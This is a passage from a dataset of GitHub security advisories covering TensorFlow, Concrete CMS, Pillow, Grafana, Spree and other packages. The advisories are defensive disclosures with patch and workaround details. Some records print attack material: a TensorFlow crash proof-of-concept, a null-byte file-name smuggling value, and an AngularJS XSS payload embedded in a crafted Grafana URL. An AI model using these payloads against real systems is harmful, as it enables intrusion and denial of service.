this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-49rx-x2rw-pc6f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41205'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7cf73a2274732c9d82af51c2bc2cf90d13cd7e6d'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:43:35Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-g3p2-hfqr-9m25,2023-06-30T20:31:40Z,2021-11-23T17:54:26Z,,['CVE-2021-22968'],Improper file handling in concrete5/core,"A bypass of adding remote files in Concrete CMS (previously concrete5) File Manager leads to remote code execution in Concrete CMS (concrete5) versions 8.5.6 and below. The external file upload feature stages files in the public directory even if they have disallowed file extensions. They are stored in a directory with a random name, but it's possible to stall the uploads and brute force the directory name. You have to be an admin with the ability to upload files, but this bug gives you the ability to upload restricted file types and execute them depending on server configuration. To fix this, a check for allowed file extensions was added before downloading files to a tmp directory","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22968'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1350444'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}, {'type': 'PACKAGE', 'url': 'https://github.com/olsgreen/concrete5-core'}]","{'cwe_ids': ['CWE-330', 'CWE-98'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:41:50Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}" +1.4.0,GHSA-vcqg-3p29-xw73,2023-01-24T18:07:16Z,2021-11-03T18:04:41Z,,['CVE-2020-5310'],Integer overflow in Pillow,"libImaging/TiffDecode.c in Pillow before 6.2.2 has a TIFF decoding integer overflow, related to realloc.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5310'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/4e2def2539ec13e53a82e06c4b3daf00454100c4'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-db/blob/7872b0a91b4d980f749e6d75a81f8cc1af32829f/vulns/pillow/PYSEC-2020-81.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2MMU3WT2X64GS5WHDPKKC2WZA7UIIQ3A/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DUMIBUYGJRAVJCTFUWBRLVQKOUTVX5P/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/6.2.2.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4272-1/'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T17:23:34Z', 'nvd_published_at': '2020-01-03T01:15:00Z'}" +1.4.0,GHSA-26xx-m4q2-xhq8,2023-05-04T19:59:52Z,2021-11-18T20:14:19Z,,['CVE-2021-41275'],Authentication Bypass by CSRF Weakness,"### Impact + +CSRF vulnerability that allows user account takeover. + +All applications using any version of the frontend component of `spree_auth_devise` are affected if `protect_from_forgery` method is both: + +* Executed whether as: + * A before_action callback (the default) + * A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find). +* Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception). + +That means that applications that haven't been configured differently from what it's generated with Rails aren't affected. + +Thanks @waiting-for-dev for reporting and providing a patch 👏 + +### Patches + +Spree 4.3 users should update to spree_auth_devise 4.4.1 +Spree 4.2 users should update to spree_auth_devise 4.2.1 +Spree 4.1 users should update to spree_auth_devise 4.1.1 +Older Spree version users should update to spree_auth_devise 4.0.1 + +### Workarounds + +If possible, change your strategy to :exception: + +```ruby +class ApplicationController < ActionController::Base + protect_from_forgery with: :exception +end +``` + +Add the following to`config/application.rb `to at least run the `:exception` strategy on the affected controller: + +```ruby +config.after_initialize do + Spree::UsersController.protect_from_forgery with: :exception +end +``` + +### References +https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.4.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/security/advisories/GHSA-26xx-m4q2-xhq8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41275'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/commit/adf6ed4cd94d66091776b5febd4ff3767362de63'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2021-41275.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spree/spree_auth_devise'}]","{'cwe_ids': ['CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T21:07:45Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}" +1.4.0,GHSA-xx4c-jj58-r7x6,2022-07-12T00:11:53Z,2021-11-19T20:14:23Z,,[],Inefficient Regular Expression Complexity in Validator.js,"### Impact +Versions of `validator` prior to 13.7.0 are affected by an inefficient Regular Expression complexity when using the `rtrim` and `trim` sanitizers. + +### Patches +The problem has been patched in validator 13.7.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'validator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.1.0'}, {'fixed': '13.7.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/validatorjs/validator.js/security/advisories/GHSA-xx4c-jj58-r7x6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3765'}, {'type': 'WEB', 'url': 'https://github.com/validatorjs/validator.js/issues/1599'}, {'type': 'WEB', 'url': 'https://github.com/validatorjs/validator.js/pull/1738'}, {'type': 'PACKAGE', 'url': 'https://github.com/validatorjs/validator.js'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c37e975c-21a3-4c5f-9b57-04d63b28cfc9/'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:27:48Z', 'nvd_published_at': None}" +1.4.0,GHSA-h352-g5vw-3926,2023-06-13T17:27:02Z,2021-11-16T17:26:47Z,,['CVE-2021-43620'],Improper Input Validation in fruity,"Methods of NSString for conversion to a string may return a partial result. Since they call CStr::from_ptr on a pointer to the string buffer, the string is terminated at the first null byte, which might not be the end of the string. + +In addition to the vulnerable functions listed for this issue, the implementations of Display, PartialEq, PartialOrd, and ToString for NSString are also affected, since they call those functions. + +Since NSString is commonly used as the type for paths by the Foundation framework, null byte truncation might allow for easily bypassing file extension checks. For example, if a file name is provided by a user and validated to have one of a specific set of extensions, with validation taking place before truncation, an attacker can add an accepted extension after a null byte (e.g., file.exe\0.txt). After truncation, the file name used by the application would be file.exe. + +It would be better to generate unique names for files, instead of using user-provided names, but not all applications take this approach.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'fruity'}, 'ecosystem_specific': {'affected_functions': ['fruity::foundation::NSString::to_str', 'fruity::foundation::NSString::to_str_with_nul', 'fruity::foundation::NSString::to_string', 'fruity::foundation::NSString::to_string_with_nul']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43620'}, {'type': 'WEB', 'url': 'https://github.com/nvzqz/fruity/issues/14'}, {'type': 'WEB', 'url': 'https://github.com/rustsec/advisory-db/pull/1102'}, {'type': 'PACKAGE', 'url': 'https://github.com/nvzqz/fruity'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0123.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-16T15:32:42Z', 'nvd_published_at': '2021-11-15T05:15:00Z'}" +1.4.0,GHSA-g9wh-3vrx-r7hg,2021-11-10T18:19:37Z,2021-11-10T20:39:23Z,,['CVE-2021-3912'],OctoRPKI crashes when processing GZIP bomb returned via malicious repository,"OctoRPKI tries to load the entire contents of a repository in memory, and in the case of a GZIP bomb, unzip it in memory, making it possible to create a repository that makes OctoRPKI run out of memory (and thus crash). + +## Patches + +## For more information +If you have any questions or comments about this advisory email us at security@cloudflare.com + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-g9wh-3vrx-r7hg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3912'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/commit/648658b1b176a747b52645989cfddc73a81eacad'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0253'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}, {'type': 'PACKAGE', 'url': 'github.com/cloudflare/cfrpki'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:19:37Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}" +1.4.0,GHSA-hwhf-64mh-r662,2021-11-04T17:05:51Z,2021-11-01T19:16:31Z,,['CVE-2021-41186'],ReDoS vulnerability in parser_apache2,"### Impact +parser_apache2 plugin in Fluentd v0.14.14 to v1.14.1 suffers from a regular expression denial of service (ReDoS) vulnerability. A broken apache log with a certain pattern of string can spend too much time in a regular expression, resulting in the potential for a DoS attack. + +### Patches +v1.14.2 + +### Workarounds +Either of the following: + +* Don't use parser_apache2 for parsing logs which cannot guarantee generated by Apache. +* Put patched version of parser_apache2.rb into /etc/fluent/plugin directory (or any other directories specified by the environment variable `FLUENT_PLUGIN` or `--plugin` option of fluentd). + +### References +* [CVE-2021-41186](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41186) +* [GHSA-hwhf-64mh-r662](https://github.com/fluent/fluentd/security/advisories/GHSA-hwhf-64mh-r662) +* [GHSL-2021-102](https://securitylab.github.com/advisories/GHSL-2021-102-fluent-fluentd/) +* https://github.com/fluent/fluentd/blob/master/CHANGELOG.md#v1142 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'fluentd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.14'}, {'fixed': '1.14.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fluent/fluentd/security/advisories/GHSA-hwhf-64mh-r662'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41186'}, {'type': 'WEB', 'url': 'https://github.com/fluent/fluentd/commit/5482a3d049dab351de0be68f4b4bc562319d8511'}, {'type': 'PACKAGE', 'url': 'https://github.com/fluent/fluentd'}, {'type': 'WEB', 'url': 'https://github.com/fluent/fluentd/blob/master/CHANGELOG.md#v1142'}, {'type': 'WEB', 'url': 'https://github.com/github/securitylab-vulnerabilities/blob/52dc4a2a828c6dc24231967c2937ad92038184a9/vendor_reports/GHSL-2021-102-fluent-fluentd.md'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/fluentd/CVE-2021-41186.yml'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-29T13:44:13Z', 'nvd_published_at': '2021-10-29T14:15:00Z'}" +1.4.0,GHSA-fr77-rrx3-cp7g,2021-11-08T22:31:43Z,2021-11-10T19:00:31Z,,['CVE-2021-41212'],Heap OOB read in `tf.ragged.cross`,"### Impact +The [shape inference code for `tf.ragged.cross`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/ragged_array_ops.cc#L64) can trigger a read outside of bounds of heap allocated array: + +```python +import tensorflow as tf + +@tf.function +def test(): + y = tf.raw_ops.RaggedCross(ragged_values=[], + ragged_row_splits=[], + sparse_indices=[[5]], + sparse_values=[], + sparse_shape=[5], + dense_inputs=[['a']], + input_order='RD', + hashed_output=False, + num_buckets=5, + hash_key=2, + out_values_type=tf.string, + out_row_splits_type=tf.int64) + return y + +test() +``` + +### Patches +We have patched the issue in GitHub commit [fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8](https://github.com/tensorflow/tensorflow/commit/fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fr77-rrx3-cp7g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41212'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:31:43Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-2cqg-q7jm-j35c,2021-11-17T21:13:25Z,2021-11-15T23:19:42Z,,['CVE-2021-3938'],snipe-it is vulnerable to Cross-site Scripting,snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.4.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.3.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3938'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/9ed1442bd124710f4178992cc4eca5236c7396b9'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/198a0d67-9189-4170-809b-0f8aea43b063'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:10:46Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}" +1.4.0,GHSA-wwgq-9jhf-qgw6,2021-11-17T21:08:25Z,2021-11-18T15:46:57Z,,['CVE-2021-41273'],Cross-Site Request Forgery allowing sending of test emails and generation of node auto-deployment keys,"### Impact +Due to improperly configured CSRF protections on two routes, a malicious user could execute a CSRF-based attack against the following endpoints: + +* Sending a test email. +* Generating a node auto-deployment token. + +At no point would any data be exposed to the malicious user, this would simply trigger email spam to an administrative user, or generate a single auto-deployment token unexpectedly. This token is not revealed to the malicious user, it is simply created unexpectedly in the system. + +### Patches +This has been addressed in https://github.com/pterodactyl/panel/commit/bf9cbe2c6d5266c6914223e067c56175de7fc3a5 which will be released as `1.6.6`. + +### Workarounds +Users may optionally manually apply the fixes released in v1.6.6 to patch their own systems. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pterodactyl/panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/security/advisories/GHSA-wwgq-9jhf-qgw6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41273'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/panel/commit/bf9cbe2c6d5266c6914223e067c56175de7fc3a5'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/panel'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T14:37:10Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}" +1.4.0,GHSA-3j9m-hcv9-rpj8,2021-11-29T15:05:31Z,2021-11-08T18:13:19Z,,['CVE-2021-41174'],XSS vulnerability allowing arbitrary JavaScript execution,"Today we are releasing Grafana 8.2.3. This patch release includes an important security fix for an issue that affects all Grafana versions from 8.0.0-beta1. + +[Grafana Cloud](https://grafana.com/cloud) instances have already been patched and an audit did not find any usage of this attack vector. [Grafana Enterprise](https://grafana.com/products/enterprise) customers were provided with updated binaries under embargo. + +## CVE-2021-41174 XSS vulnerability on unauthenticated pages + +### Summary + +CVSS Score: 6.9 Medium +CVSS:[CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N/E:U/RL:O/RC:R/CR:L/MAV:N/MAC:H/MPR:N/MUI:R/MS:C/MC:N/MI:H/MA:L](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N/E:U/RL:O/RC:R/CR:L/MAV:N/MAC:H/MPR:N/MUI:R/MS:C/MC:N/MI:H/MA:L) + +We received a security report to security@grafana.com on 2021-10-21 about a vulnerability in Grafana regarding the XSS vulnerability. + +It was later identified as affecting Grafana versions from 8.0.0-beta1 to 8.2.2. [CVE-2021-41174](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41174) has been assigned to this vulnerability. + +### Impact + +If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. + +The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. + +There are two ways an unauthenticated user can open a page in Grafana that contains the login button: +- Anonymous authentication is enabled. This means all pages in Grafana would be open for the attack. +- The link is to an unauthenticated page. The following pages are vulnerable: + - `/dashboard-solo/snapshot/*` + - `/dashboard/snapshot/*` + - `/invite/:code` + +The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. AngularJS uses double curly braces for interpolation binding: {{ }} + +An example of an expression would be: `{{constructor.constructor(‘alert(1)’)()}}`. This can be included in the link URL like this: + +https://play.grafana.org/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1 + +When the user follows the link and the page renders, the login button will contain the original link with a query parameter to force a redirect to the login page. The URL is not validated and the AngularJS rendering engine will execute the JavaScript expression contained in the URL. + +### Attack audit + +We can not guarantee that the below will identify all attacks, so if you find something using the audit process described below, you should consider doing a full assessment. + +#### Through reverse proxy/load balancer logs + +To determine if your Grafana installation has been exploited for this vulnerability, search through your reverse proxy/load balancer access logs for instances where the path contains `{{` followed by something that would invoke JavaScript code. For example, this could be code that attempts to show a fake login page or to steal browser or session data. The [OWASP cheat sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) has several examples of XSS attacks. + +#### Through the Grafana Enterprise audit feature + +If you enabled “Log web requests” in your configuration with `router_logging = true`, look for requests where `path` contains `{{` followed by something that would invoke JavaScript code. + +### Patched versions + +Release 8.2.3: + +- [Download Grafana 8.2.3](https://grafana.com/grafana/download/8.2.3) +- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-2-3/) + +### Solutions and mitigations + +Download and install the appropriate patch for your version of Grafana. + +[Grafana Cloud](https://grafana.com/cloud) instances have already been patched, and [Grafana Enterprise](https://grafana.com/products/enterprise) customers were provided with updated binaries under embargo. + +### Workaround + +If for some reason you cannot upgrade, you can use a reverse proxy or similar to block access to block the literal string `{{` in the path. + +Example of an Nginx rule to block the literal string `{{`: + +``` +location ~ \{\{ { + deny all; +} +``` +### Timeline and postmortem + +Here is a detailed timeline starting from when we originally learned of the issue. All times in UTC. + +* 2021-10-21 23:13: Security researcher sends the initial report about an XSS vulnerability. +* 2021-10-21 23:13: Confirmed to be reproducible in at least versions 8.0.5 and 8.2.2. +* 2021-10-22 02:02 MEDIUM severity declared. +* 2021-10-22 09:22: it is discovered that Grafana instances with anonymous auth turned on are vulnerable. This includes https://play.grafana.org/ . +* 2021-10-22 09:50: Anonymous access disabled for all instances on Grafana Cloud as a mitigation measure. +* 2021-10-22 11:15: Workaround deployed on Grafana Cloud that blocks malicious requests. +* 2021-10-22 12:35: Enabled anonymous access for instances on Grafana Cloud. +* 2021-10-22 12:51: All instances protected by the workaround. From this point forward, Grafana Cloud is no longer affected. +* 2021-10-22 14:05 Grafana Cloud instances updated with a fix. +* 2021-10-22 19:23 :Determination that no weekend work is needed as the issue is of MEDIUM severity and the root cause has been identified. +* 2021-10-25 14:13: Audit of Grafana Cloud concluded, no evidence of exploitation. +* 2021-10-27 12:00: Grafana Enterprise images released to customers under embargo. +* 2021-11-03 12:00: Public release. + +## Reporting security issues + +If you think you have found a security vulnerability, please send a report to [security@grafana.com](mailto:security@grafana.com). This address can be used for all of +Grafana Labs' open source and commercial products (including but not limited to Grafana, Tempo, Loki, k6, Tanka, and Grafana Cloud, Grafana Enterprise, and grafana.com). We only accept vulnerability reports at this address. We would prefer that you encrypt your message to us using our PGP key. The key fingerprint is: + +F988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA + +The key is available from [ keyserver.ubuntu.com]( https://keyserver.ubuntu.com/pks/lookup?op=get&fingerprint=on&search=0xD1258932BE24C5CA) by searching for [security@grafana]( https://keyserver.ubuntu.com/pks/lookup?search=security@grafana&fingerprint=on&op=index). + +## Security announcements + +There is a Security [category](https://grafana.com/tags/security/) on the Grafana blog where we will post a summary, remediation, and mitigation details for any patch containing security fixes and you can subscribe to updates from our [Security Announcements RSS feed](https://grafana.com/tags/security/index.xml).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@grafana/data'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.2.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41174'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82'}, {'type': 'WEB', 'url': 